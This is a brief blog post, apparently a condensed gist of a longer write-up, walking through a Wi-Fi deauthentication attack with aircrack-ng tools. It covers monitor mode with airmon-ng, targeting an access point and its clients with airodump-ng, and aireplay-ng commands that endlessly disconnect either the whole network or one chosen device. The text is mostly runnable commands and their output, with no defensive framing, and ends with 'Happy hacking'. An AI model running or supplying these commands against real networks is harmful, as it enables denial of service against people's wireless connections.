1 supporter
Deauthentication Attack Gist

Deauthentication Attack Gist

Jan 14, 2024

This Post is the Gist of my Writeup about Deauthentication Attack on the Hacker Realm of Sudorealm

Check Wireless Card Connection

root@kali:~# ifconfig wlan0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether fa:30:3e:ca:dd:85  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
root@kali~# iwconfig wlan0

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=off   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Set Card on Monitor Mode

root@kali:~# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  448 NetworkManager
  525 dhclient
  654 wpa_supplicant

PHY	Interface	Driver		Chipset

phy0	wlan0		ath9k_htc	Atheros Communications, Inc. TP-Link TL-WN322G v3 / TL-WN422G v2 802.11g [Atheros AR9271]

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~# iwconfig wlan0mon

wlan0mon  IEEE 802.11
          Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Monitoring Results:

CH 12 ][ Elapsed: 6 s ][ 2020-09-02 15:41                                         
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

50:C7:BF:DC:4C:E8  -45   18         0      0    11  270  WPA2 CCMP   PSK  TP-LINK_AP_4CE8

Specific targeting for Better Result

airodump-ng -d 50:C7:BF:DC:4C:E8 -c 11 wlan0mon

Now we are monitoring SPECIFICALLY our target and not all nearby access points. Also, we can see that there are two devices currently inside the network, one of which is my phone!

CH 11 ][ Elapsed: 1 min ][ 2020-09-02 15:59 ]                        
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 50:C7:BF:DC:4C:E8  -22  91      610      163    4  11  270  WPA2 CCMP   PSK  TP-LINK_AP_4CE8            
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                               
 50:C7:BF:DC:4C:E8  AC:3C:0B:36:BD:5B  -32    0e-24      0       12                                       
 50:C7:BF:DC:4C:E8  E0:B5:2D:EA:18:A7  -58    1e-24      6      122  

Deauthenticating device from network //Kicking

aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 wlan0mon

Takedown of the entire Network.

aireplay-ng -0 0 -a 50:C7:BF:DC:4C:E8 -c E0:B5:2D:EA:18:A7 wlan0mon

Kick from the network-specific device, more efficient IMHO. πŸ€·β€β™‚οΈ

-0 0: Deauths for ever | -0 10: Sends 10 Deauth packets

πŸŽ‰Happy hacking my friends!πŸ₯‚


πŸ”₯πŸ”₯πŸ”₯ FIRE πŸ”₯πŸ”₯πŸ”₯

Enjoy this post?

Buy d3adR1nger a coffee

More from d3adR1nger